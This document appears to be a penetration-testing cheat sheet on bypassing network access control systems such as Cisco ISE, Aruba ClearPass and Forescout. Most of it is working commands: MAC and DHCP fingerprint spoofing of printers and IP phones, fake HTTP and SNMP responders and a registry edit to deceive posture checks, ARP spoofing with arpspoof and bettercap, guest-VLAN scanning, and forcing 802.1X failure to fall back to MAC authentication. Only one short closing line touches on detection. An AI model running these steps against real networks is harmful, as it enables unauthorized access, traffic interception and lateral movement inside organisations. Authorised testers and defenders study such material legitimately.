NAC Bypass

Device → Switch → NAC Server (ISE/ClearPass/Forescout)
                ↕
          RADIUS/802.1X
                ↕
          Identity Store (AD/LDAP)

# NAC systems using MAB typically:
# 1. Allow immediate DHCP after association (no EAP)
# 2. Assign devices to a quarantine VLAN initially
# 3. Move devices to the correct VLAN after MAC auth

# Connect and check your VLAN assignment
ip addr show eth0
# If you're on a quarantine/guest VLAN (e.g., VLAN 999, 4094, 100), MAB is likely in use

# Check DHCP response for NAC indicators
dhclient -1 -v eth0 2>&1 | grep -i "option"
# Look for: option 77 (user-class), option 60 (vendor-class), option 125 (V-I)

# 1. Discover allowed MAC addresses
# See [MAC Filtering Bypass](mac-filtering-bypass.md) for detailed MAC discovery

# 2. Choose the right device type to spoof
# Printers and IoT devices are often whitelisted with minimal profiling
# Common targets:
# - HP printers (OUI: 00:1A:4B, 00:17:A4, 00:1E:0B)
# - Cisco phones (OUI: 00:00:0C, 00:03:E3, 00:06:28)
# - Polycom phones (OUI: 00:04:F2, 00:07:53, 00:0E:7E)
# - IoT sensors (various)

# 3. Spoof the MAC
sudo ip link set dev eth0 down
sudo ip link set dev eth0 address <TARGET_MAC>
sudo ip link set dev eth0 up

# 4. Request DHCP
sudo dhclient -1 eth0

# 5. Verify access
ip addr show eth0
ping -c 3 <target_ip>

# DHCP fingerprint spoofing
# Use dhclient with custom options that match the target device type

# Example: Spoof a Windows printer
cat > /etc/dhcp/dhclient.conf << 'EOF'
option vendor-class-identifier "MSFT 5.0";
option user-class "Windows";
option dhcp-client-identifier 01:<MAC_IN_HEX>;
request subnet-mask, broadcast-address, routers, domain-name-servers, domain-name;
EOF

sudo dhclient -1 -cf /etc/dhcp/dhclient.conf eth0

# Example: Spoof a Cisco IP phone
cat > /etc/dhcp/dhclient.conf << 'EOF'
option vendor-class-identifier "Cisco Systems, Inc. IP Phone CP-7960G";
option user-class "Cisco";
option tftp-server-name "192.168.1.1";
request subnet-mask, broadcast-address, routers, domain-name-servers, tftp-server-name;
EOF

sudo dhclient -1 -cf /etc/dhcp/dhclient.conf eth0

# Set up a fake HTTP server that responds with the target device's profile
python3 << 'EOF'
from http.server import HTTPServer, BaseHTTPRequestHandler

class NACHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path == "/":
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            # Respond with a page that matches the device profile
            self.wfile.write(b"<html><body>HP LaserJet Pro MFP</body></html>")
        else:
            self.send_response(404)
            self.end_headers()

server = HTTPServer(("0.0.0.0", 80), NACHandler)
server.serve_forever()
EOF

# Cisco ISE with AnyConnect posture module
# The agent reports device health to ISE
# Bypass options:

# 1. Spoof the posture agent report
# Locate the posture agent cache on a compliant device
# Windows: C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\

# 2. Use a pre-configured VPN/agent image
# Create a VM with compliant posture (AV installed, patched, encrypted)

# 3. Time-based bypass
# Some NAC systems allow a grace period before posture assessment
# Connect and quickly establish persistence before the grace period expires

# Agentless posture uses network probes (HTTP, SNMP, WMI)
# to assess device health

# Bypass: Respond to probes with compliant data

# 1. HTTP redirect probe
# NAC redirects HTTP traffic to a posture portal
# Bypass: Use HTTPS/DNS tunneling before posture check
# See [Captive Portal Bypass](../wifi-attacks/captive-portal-bypass.md)

# 2. SNMP probe
# NAC queries SNMP for device information
# Respond with compliant data:
snmpd -c public -Ls 4 -p /var/run/snmpd.pid

# Configure snmpd to return compliant device information
cat > /etc/snmp/snmpd.conf << 'EOF'
syscontact "IT Support <it@company.com>"
syslocation "Office"
sysServices 72
rocommunity public
EOF

# 3. Registry/WMI probe (Windows)
# NAC checks registry keys for AV status, patch level, etc.
# Modify registry to appear compliant:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YourAV" /v "InstallDate" /t REG_SZ /d "20250101" /f

# 1. VPN VLAN bypass
# Some networks allow VPN traffic to bypass NAC
# Connect to VPN from a non-NAC-enforced network
sudo openvpn config.ovpn

# 2. Management VLAN access
# Switch management interfaces may be on a separate VLAN
# that bypasses NAC
nmap -sn <management_subnet>

# 3. Printer/IoT VLAN
# These VLANs often have relaxed NAC policies
# Spoof a printer MAC and connect to the printer VLAN
# See MAB spoofing above

# 4. Guest VLAN pivot
# The guest VLAN may have access to internal resources
# that are not properly segmented
nmap -sn <guest_vlan_subnet>
nmap -sV -p 80,443,22,3389 <target_from_guest>

# After connecting to a quarantine/guest VLAN
# Use ARP spoofing to redirect traffic through a compliant device

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

# ARP spoof between target and gateway
arpspoof -i eth0 -t <target_ip> <gateway_ip>
arpspoof -i eth0 -t <gateway_ip> <target_ip>

# Or use bettercap
sudo bettercap -iface eth0
> net.probe on
> set arp.spoof.targets <target_ip>
> arp.spoof on
> net.sniff on

# Cisco ISE profiling bypass techniques:

# 1. Profiling delay exploitation
# ISE profiles devices over 30-60 seconds
# During this window, some policies may allow broader access
# Connect, enumerate, and establish persistence before profiling completes

# 2. Endpoint identity group spoofing
# Spoof a MAC from a group with permissive policy
# Common groups: "Guest", "BYOD", "Printers", "Cameras"

# 3. Profiling endpoint cleanup
# If the NAC database has stale entries, use a MAC from a decommissioned device
# that still has an active profile

# 4. DHCP option 55 (Parameter Request List) spoofing
# Different OSes request different DHCP options
# Spoof the DHCP fingerprint of a compliant device

# Windows fingerprint
# Option 55: 1,3,6,15,31,33,43,44,46,47,119,121,249,252

# Linux fingerprint
# Option 55: 1,28,3,6,12,15,17,23,28,33,40,41,42,43,44,46,47

# macOS fingerprint
# Option 55: 1,3,6,15,25,26,28,41,42,119,121,249

# ClearPass profiling bypass techniques:

# 1. Device category spoofing
# ClearPass categorizes devices by type
# Spoof a device in a permissive category (IoT, printer, VoIP)

# 2. ClearPass OnGuard bypass
# OnGuard is the posture agent for ClearPass
# Bypass by running in a VM with compliant posture
# Or by spoofing the OnGuard health report

# 3. ClearPass Guest bypass
# Guest accounts may have broader access than intended
# Create a guest account and test lateral access

# Forescout (CounterACT) bypass techniques:

# 1. Agentless assessment bypass
# Forescout uses network probes for agentless assessment
# Ensure your device responds to probes with compliant data
# (See HTTP/SNMP fingerprint spoofing above)

# 2. Forescout eyeInspect (vulnerability scan)
# May detect known vulnerabilities on your device
# Use a patched, compliant OS for initial access

# 3. Forescout compliance check
# Checks: AV installed, OS patched, disk encrypted, firewall enabled
# Ensure all checks pass before connecting

# Attack: Trigger 802.1X failure to force MAB failover
# 1. Attempt 802.1X with invalid credentials
# 2. NAC falls back to MAB
# 3. Spoof an allowed MAC address for MAB
# 4. Gain access

# This works because:
# - The NAC policy may allow MAB devices more access than intended
# - MAB is inherently weaker than 802.1X
# - The failover may assign the device to a less restrictive VLAN

# Detection:
# Check if the NAC policy allows MAB failover:
# Cisco ISE: Authentication Failed → MAB → Limited Access
# Aruba ClearPass: Role Mapping → [802.1X Failed] → [MAB Fallback]